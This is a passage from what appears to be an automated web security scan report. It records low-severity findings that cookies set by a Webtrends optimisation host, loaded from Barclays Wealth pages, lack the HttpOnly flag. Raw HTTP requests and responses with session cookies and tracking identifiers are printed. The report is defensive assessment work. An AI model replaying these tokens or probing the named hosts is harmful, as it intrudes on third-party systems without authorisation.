b079c1212ab7efdc00fd0e67390dce619490a68a90dabe82c3e6c4523bbe2370e44903ec1fff26af491f3a80a8a30f117037707788fcc1c5c0e545bede61b1b5f83b28e140d41eab2e11d8b57b7124ad49abc9cb4645a2b4db844922e052a3fa45ce27b9080fd9d5b3f35a355ce4bd6debbbcc27738506f0ba79e08934a51f4abdd5be999a924dc8cf28c29405bf80125727f43370b60e421f42fb65b814a1037319a24cb7118940f44d02e754b3fb5002692544e0c8fdcc05bf447d1f54cf0b4d2f6fa2e5eab7ef6d2fa2e872533078eab591fc1660608ef17462cd9f445fdfee2ae179215751de5723ae413e5c4a1d6a6913776a484080cd69a7f84ff07952fa48a017e306b1ebe7897fcf3822ae0716932441531c4181a1a1ec184818828263f938b451d976b1ab58cdc6d3c20d37a7f48f5f980c7f34474938722c484d07360785fd1ed5db043df2991ac1ff1a04ec51daff296a1d301a337a3c7918c8f4dab8c15af2cfd449fda6b6cb311e68618d215ac6ca2bf10bfe3611788ee7015b2761bcbfb8d78a653d451b9752a3eb3b05dde2b4343a06a9748bfe5d3d999fe54900f1124be3e75f661cce54c016d7c29d8133993a5a21032a211cec0e6df46cc6e48f5f1d79bdf27ff85762a311e89853a66d55bae30542520607c390a59021e796565519f48f7f3880c270f7d6045a5417d365a6e9cf602200c9da6e950819f71cbd04da3f3be054bd67e261af3196b1ebe023d1774 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/important-information.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A03C4F80BFCFBF92FCB64700ED6E25D0; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d0406738a; _wt.mode-79569=fcdcc722e932043ee114; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00bb0854

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:17 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=6EDFD59FF31DFFC88DA19690B7FF95B4; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d016e163d; Expires=Sun, 01-Jan-2012 00:03:18 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=01c65249; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93203b7c335; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.30. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055b27ece43f6b67250d626c3324dfc5f24665e19610aff21f06f7771fc5585dd90b50aa6c8281c8ebd2ba97ac4f849060f9bf5a8a7978a5df974008bda0bbcdc493071284fadbe1b9ece4490b55e8bc9d291f7261065f9772a81190210a5df2d53b3093a1e5baf6e4ee0281a66a1200432074bc2539f7fc318bbe2aee8205ba4b993c3d818c00abe76ae154ac4be1e16444df65c4d12929eb19ccc370786dda475b94a1dba4d45e0d49d109ce11f81671825f00bbf913c3d8496ffde4bb1e6a37a34610386c5149849847672b9277865f2d62bc9bcacedbe7bcc01b57b25f75119f416553cf0f9e3382818c37ba75532e024d0cc67f455cbf5112b9bce05b92d3eab5ac2a255a919c446c40134ec755ef66acc0a80662af3e760920bba4deb34233b0b23e7af8080927a2990a6f8cc86f68cb9d3df724b2e85caa480cc5d524a85713650c145b71a5a7929c45ddb48a1a7bffa54b73e0852fe69740434298d340d36343feba83b21c070571c72474b280cd2d25888cdb3ad39d8103f9073ea6456062434f0e3b43706520b52b917d0e3b2bb5287572dc4981551aa05c13f7df265f2d453c4ab23acd8e53d5c1c37b274f0a94c7b385428c3963c1c47d3689cf3a53cf195a6fb0f8d64f0460d76037b8bcd46595e0551b9e719160185b58116091bebe7e7408454b343178f9ab6cfe562577f19b64e907c0f2b6eaa50b82e9b80ff985b6332a659cd4986d1bce8c7233c0d3e59f69003cf1904f4aeda59b59ef975dcd8a38c791f5aae5725292f453c5a33e575fa2ee60c8e4a1f6765ce21cf7514c20745d827764c69ee052396594c0dd8d8c657a54ed0a74ef4e484aaa82c5aab7da3ddf83e9d335131b0de6c6986641702ba040f3ce29b04b9a5b4bf15d106770e8317549a7695d5acc7e1c4266bb1ee4641c0cf26ceab199321a4850164327f56ec2fc5a8f18921bd706c2e45032e8322745e5e8eca81ed7d633fd7ce0e5e8a7212b38bd27a3f3b8e7b705bbdedecf9e0512b93912dd1d3c26b7b4639c7fb06a959d36991b51ef5a24bc71da3fb9cf69e55bc37eb8786d7de09eacb0aee15eb0780d3303fe70de0881cd74fba61e6bd10e2e63215d8be211ab5764ecdfe8c27f005d144a2314028feff49cc2f540fa135c148e2f38c9a99f45f96531521ed6f27a53ac8e71a05647b718d136d92aba34c33f5139ac8e7df17cd6f4ff7a58fca8a23ffd5727d3e4ad8d46e66810bab63577720342c6d080d061f22693154cb4ff8ac81002359706213af427a62063dc0ae05245f9eaaed0dd7c824cbd64eacf4ed034d802b7f4af409215bf10f0c92dce57232c793a3e6abdabf4ba22b4583f63180f95a2452a3ef19a7b1aed4406a32a1a1ca57995641a23bd2851b1653e7e46fd65dcffa3be2858ef8df5e51fc8a87f861d8ba8edbeb93527d2f08308f06b02e4c782d206e57f58b0cbc9813b96bf04fac7df0c06130f8d0385b04d12a96  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055b27ece43f6b67250d626c3324dfc5f24665e19610aff21f06f7771fc5585dd90b50aa6c8281c8ebd2ba97ac4f849060f9bf5a8a7978a5df974008bda0bbcdc493071284fadbe1b9ece4490b55e8bc9d291f7261065f9772a81190210a5df2d53b3093a1e5baf6e4ee0281a66a1200432074bc2539f7fc318bbe2aee8205ba4b993c3d818c00abe76ae154ac4be1e16444df65c4d12929eb19ccc370786dda475b94a1dba4d45e0d49d109ce11f81671825f00bbf913c3d8496ffde4bb1e6a37a34610386c5149849847672b9277865f2d62bc9bcacedbe7bcc01b57b25f75119f416553cf0f9e3382818c37ba75532e024d0cc67f455cbf5112b9bce05b92d3eab5ac2a255a919c446c40134ec755ef66acc0a80662af3e760920bba4deb34233b0b23e7af8080927a2990a6f8cc86f68cb9d3df724b2e85caa480cc5d524a85713650c145b71a5a7929c45ddb48a1a7bffa54b73e0852fe69740434298d340d36343feba83b21c070571c72474b280cd2d25888cdb3ad39d8103f9073ea6456062434f0e3b43706520b52b917d0e3b2bb5287572dc4981551aa05c13f7df265f2d453c4ab23acd8e53d5c1c37b274f0a94c7b385428c3963c1c47d3689cf3a53cf195a6fb0f8d64f0460d76037b8bcd46595e0551b9e719160185b58116091bebe7e7408454b343178f9ab6cfe562577f19b64e907c0f2b6eaa50b82e9b80ff985b6332a659cd4986d1bce8c7233c0d3e59f69003cf1904f4aeda59b59ef975dcd8a38c791f5aae5725292f453c5a33e575fa2ee60c8e4a1f6765ce21cf7514c20745d827764c69ee052396594c0dd8d8c657a54ed0a74ef4e484aaa82c5aab7da3ddf83e9d335131b0de6c6986641702ba040f3ce29b04b9a5b4bf15d106770e8317549a7695d5acc7e1c4266bb1ee4641c0cf26ceab199321a4850164327f56ec2fc5a8f18921bd706c2e45032e8322745e5e8eca81ed7d633fd7ce0e5e8a7212b38bd27a3f3b8e7b705bbdedecf9e0512b93912dd1d3c26b7b4639c7fb06a959d36991b51ef5a24bc71da3fb9cf69e55bc37eb8786d7de09eacb0aee15eb0780d3303fe70de0881cd74fba61e6bd10e2e63215d8be211ab5764ecdfe8c27f005d144a2314028feff49cc2f540fa135c148e2f38c9a99f45f96531521ed6f27a53ac8e71a05647b718d136d92aba34c33f5139ac8e7df17cd6f4ff7a58fca8a23ffd5727d3e4ad8d46e66810bab63577720342c6d080d061f22693154cb4ff8ac81002359706213af427a62063dc0ae05245f9eaaed0dd7c824cbd64eacf4ed034d802b7f4af409215bf10f0c92dce57232c793a3e6abdabf4ba22b4583f63180f95a2452a3ef19a7b1aed4406a32a1a1ca57995641a23bd2851b1653e7e46fd65dcffa3be2858ef8df5e51fc8a87f861d8ba8edbeb93527d2f08308f06b02e4c782d206e57f58b0cbc9813b96bf04fac7df0c06130f8d0385b04d12a96

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055b27ece43f6b67250d626c3324dfc5f24665e19610aff21f06f7771fc5585dd90b50aa6c8281c8ebd2ba97ac4f849060f9bf5a8a7978a5df974008bda0bbcdc493071284fadbe1b9ece4490b55e8bc9d291f7261065f9772a81190210a5df2d53b3093a1e5baf6e4ee0281a66a1200432074bc2539f7fc318bbe2aee8205ba4b993c3d818c00abe76ae154ac4be1e16444df65c4d12929eb19ccc370786dda475b94a1dba4d45e0d49d109ce11f81671825f00bbf913c3d8496ffde4bb1e6a37a34610386c5149849847672b9277865f2d62bc9bcacedbe7bcc01b57b25f75119f416553cf0f9e3382818c37ba75532e024d0cc67f455cbf5112b9bce05b92d3eab5ac2a255a919c446c40134ec755ef66acc0a80662af3e760920bba4deb34233b0b23e7af8080927a2990a6f8cc86f68cb9d3df724b2e85caa480cc5d524a85713650c145b71a5a7929c45ddb48a1a7bffa54b73e0852fe69740434298d340d36343feba83b21c070571c72474b280cd2d25888cdb3ad39d8103f9073ea6456062434f0e3b43706520b52b917d0e3b2bb5287572dc4981551aa05c13f7df265f2d453c4ab23acd8e53d5c1c37b274f0a94c7b385428c3963c1c47d3689cf3a53cf195a6fb0f8d64f0460d76037b8bcd46595e0551b9e719160185b58116091bebe7e7408454b343178f9ab6cfe562577f19b64e907c0f2b6eaa50b82e9b80ff985b6332a659cd4986d1bce8c7233c0d3e59f69003cf1904f4aeda59b59ef975dcd8a38c791f5aae5725292f453c5a33e575fa2ee60c8e4a1f6765ce21cf7514c20745d827764c69ee052396594c0dd8d8c657a54ed0a74ef4e484aaa82c5aab7da3ddf83e9d335131b0de6c6986641702ba040f3ce29b04b9a5b4bf15d106770e8317549a7695d5acc7e1c4266bb1ee4641c0cf26ceab199321a4850164327f56ec2fc5a8f18921bd706c2e45032e8322745e5e8eca81ed7d633fd7ce0e5e8a7212b38bd27a3f3b8e7b705bbdedecf9e0512b93912dd1d3c26b7b4639c7fb06a959d36991b51ef5a24bc71da3fb9cf69e55bc37eb8786d7de09eacb0aee15eb0780d3303fe70de0881cd74fba61e6bd10e2e63215d8be211ab5764ecdfe8c27f005d144a2314028feff49cc2f540fa135c148e2f38c9a99f45f96531521ed6f27a53ac8e71a05647b718d136d92aba34c33f5139ac8e7df17cd6f4ff7a58fca8a23ffd5727d3e4ad8d46e66810bab63577720342c6d080d061f22693154cb4ff8ac81002359706213af427a62063dc0ae05245f9eaaed0dd7c824cbd64eacf4ed034d802b7f4af409215bf10f0c92dce57232c793a3e6abdabf4ba22b4583f63180f95a2452a3ef19a7b1aed4406a32a1a1ca57995641a23bd2851b1653e7e46fd65dcffa3be2858ef8df5e51fc8a87f861d8ba8edbeb93527d2f08308f06b02e4c782d206e57f58b0cbc9813b96bf04fac7df0c06130f8d0385b04d12a96 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/i-alert.htm?WT.mc_id=int_q3_ialert_bwi&WT.mc_ev=click
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6470427122C0BC6EEE06A97043357700; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02420171; _wt.mode-79569=fcdcc722e9320578927c; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05d2312f

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:32 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=9C508F0AF3DD2B4F832C1514175882E4; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d03ba21d2; Expires=Sun, 01-Jan-2012 00:31:33 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=0484ff0a; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e932044d57d7; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.31. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5605a7f1b5afc5d9b38d752a7fbf8e53656e8a18bdf9f1fd25ae761ed3c7dec882b3b64609e6a6e20dbcfbcdb912759d584f823b5185ca4150ce4959a07dcff5ac53a16139211b0cb556cd69fb48a1dcba5d60771222daaf009b778966d228b012178fdd609edcf90d5924bf310972473f54a1ffc20583ba6b3c76a1733f00ac936579c56bdb60da65a9ef207789fc91bb93a6ca847c3b11dee47cf4582777ca82607b566da1ccb2577e7ff60f776ea0bc0772d236b5b8ef7c1e2c6306ac6e7b88fc498f8daaab51f3745e9cfd5c28b0d1116df17661c831bd959042170df5ec141aebdb6ee4da1566113a43522133d3e922a0e28352de9bb7b79913728403e1c15281ad2f97588dcfce239bd457a9c3ca7557d013f35a7f6b72001451715e97fd4ebcaf31add005285de6850bb18900d4dbe6beaa94189bc67bc88a5750e4331e67ae6a55d2f300c209e966a4d18d3699bf2f63ea793a2f40d8031a415567c002bdfc2155d585655b5e04e1c58d5e789155d17bdb2e54f8000b143498dcebecde1605e281ab74d927a082f6bf90ab82d9882aece0c3162f2099b49da80b9ef92723e536959fdc850cb4e07a2ae8f5bbb99fb74d8dba4897f1e5aa8062a237f493e0e64b07ef078b1038e4a1e3130cb25cf2319900c44de2f764c6bef0421955c4f5e8dd2c504a247d0f349a1e584f8ac7d0ffc7ef1dffb24897265558bae05139d380152ea441b7889a214f8f0ecfc1c9752605ad611539622c584a295ffc7203bbee24d48dadb32b7ce75e446d29e027e632d5af13eabe8b09e7bea262e721b4d2f96441e1d13cedcc2886e635096884c16f43354d3ce803f3443f42d6443b3aa8a9fa44673c2d67295d182706d2f5583be0aea42df2e90a24ef5f7499411aaf594f6d350a430a0cac08f8f1fa08a15f92baf469cd86763b117ee831bd843fb6bfcec42b7e6694189b52213b37c18caff862fa7018105b92a263ab9e60f8b294246f039914cbee6d7decfab539f554220b53b23a13fcbe41e026c2c7e884f68c4aaf14d37a74195c1e1d81799604df4aed9cad925ad8a732f3a49dcd23e31da0ffa645420703b2e6e0f0e024e206e6307ca14f2a980042409206415ff162d62063a86e3414c1f8cb1e15bd2cc689d8a1aacabac0f0bd22d7a4ca40c2451a6000d97dfb62964c0c0a5e8bac6f60f020ab845  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5605a7f1b5afc5d9b38d752a7fbf8e53656e8a18bdf9f1fd25ae761ed3c7dec882b3b64609e6a6e20dbcfbcdb912759d584f823b5185ca4150ce4959a07dcff5ac53a16139211b0cb556cd69fb48a1dcba5d60771222daaf009b778966d228b012178fdd609edcf90d5924bf310972473f54a1ffc20583ba6b3c76a1733f00ac936579c56bdb60da65a9ef207789fc91bb93a6ca847c3b11dee47cf4582777ca82607b566da1ccb2577e7ff60f776ea0bc0772d236b5b8ef7c1e2c6306ac6e7b88fc498f8daaab51f3745e9cfd5c28b0d1116df17661c831bd959042170df5ec141aebdb6ee4da1566113a43522133d3e922a0e28352de9bb7b79913728403e1c15281ad2f97588dcfce239bd457a9c3ca7557d013f35a7f6b72001451715e97fd4ebcaf31add005285de6850bb18900d4dbe6beaa94189bc67bc88a5750e4331e67ae6a55d2f300c209e966a4d18d3699bf2f63ea793a2f40d8031a415567c002bdfc2155d585655b5e04e1c58d5e789155d17bdb2e54f8000b143498dcebecde1605e281ab74d927a082f6bf90ab82d9882aece0c3162f2099b49da80b9ef92723e536959fdc850cb4e07a2ae8f5bbb99fb74d8dba4897f1e5aa8062a237f493e0e64b07ef078b1038e4a1e3130cb25cf2319900c44de2f764c6bef0421955c4f5e8dd2c504a247d0f349a1e584f8ac7d0ffc7ef1dffb24897265558bae05139d380152ea441b7889a214f8f0ecfc1c9752605ad611539622c584a295ffc7203bbee24d48dadb32b7ce75e446d29e027e632d5af13eabe8b09e7bea262e721b4d2f96441e1d13cedcc2886e635096884c16f43354d3ce803f3443f42d6443b3aa8a9fa44673c2d67295d182706d2f5583be0aea42df2e90a24ef5f7499411aaf594f6d350a430a0cac08f8f1fa08a15f92baf469cd86763b117ee831bd843fb6bfcec42b7e6694189b52213b37c18caff862fa7018105b92a263ab9e60f8b294246f039914cbee6d7decfab539f554220b53b23a13fcbe41e026c2c7e884f68c4aaf14d37a74195c1e1d81799604df4aed9cad925ad8a732f3a49dcd23e31da0ffa645420703b2e6e0f0e024e206e6307ca14f2a980042409206415ff162d62063a86e3414c1f8cb1e15bd2cc689d8a1aacabac0f0bd22d7a4ca40c2451a6000d97dfb62964c0c0a5e8bac6f60f020ab845

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5605a7f1b5afc5d9b38d752a7fbf8e53656e8a18bdf9f1fd25ae761ed3c7dec882b3b64609e6a6e20dbcfbcdb912759d584f823b5185ca4150ce4959a07dcff5ac53a16139211b0cb556cd69fb48a1dcba5d60771222daaf009b778966d228b012178fdd609edcf90d5924bf310972473f54a1ffc20583ba6b3c76a1733f00ac936579c56bdb60da65a9ef207789fc91bb93a6ca847c3b11dee47cf4582777ca82607b566da1ccb2577e7ff60f776ea0bc0772d236b5b8ef7c1e2c6306ac6e7b88fc498f8daaab51f3745e9cfd5c28b0d1116df17661c831bd959042170df5ec141aebdb6ee4da1566113a43522133d3e922a0e28352de9bb7b79913728403e1c15281ad2f97588dcfce239bd457a9c3ca7557d013f35a7f6b72001451715e97fd4ebcaf31add005285de6850bb18900d4dbe6beaa94189bc67bc88a5750e4331e67ae6a55d2f300c209e966a4d18d3699bf2f63ea793a2f40d8031a415567c002bdfc2155d585655b5e04e1c58d5e789155d17bdb2e54f8000b143498dcebecde1605e281ab74d927a082f6bf90ab82d9882aece0c3162f2099b49da80b9ef92723e536959fdc850cb4e07a2ae8f5bbb99fb74d8dba4897f1e5aa8062a237f493e0e64b07ef078b1038e4a1e3130cb25cf2319900c44de2f764c6bef0421955c4f5e8dd2c504a247d0f349a1e584f8ac7d0ffc7ef1dffb24897265558bae05139d380152ea441b7889a214f8f0ecfc1c9752605ad611539622c584a295ffc7203bbee24d48dadb32b7ce75e446d29e027e632d5af13eabe8b09e7bea262e721b4d2f96441e1d13cedcc2886e635096884c16f43354d3ce803f3443f42d6443b3aa8a9fa44673c2d67295d182706d2f5583be0aea42df2e90a24ef5f7499411aaf594f6d350a430a0cac08f8f1fa08a15f92baf469cd86763b117ee831bd843fb6bfcec42b7e6694189b52213b37c18caff862fa7018105b92a263ab9e60f8b294246f039914cbee6d7decfab539f554220b53b23a13fcbe41e026c2c7e884f68c4aaf14d37a74195c1e1d81799604df4aed9cad925ad8a732f3a49dcd23e31da0ffa645420703b2e6e0f0e024e206e6307ca14f2a980042409206415ff162d62063a86e3414c1f8cb1e15bd2cc689d8a1aacabac0f0bd22d7a4ca40c2451a6000d97dfb62964c0c0a5e8bac6f60f020ab845 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/brokerage.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1DB1B8506FA734F3D0691621AC32919E; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a025a8920; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02b1d29a; _wt.mode-79569=fcdcc722e93202cf02d7

Response

HTTP/1.1 200 OK
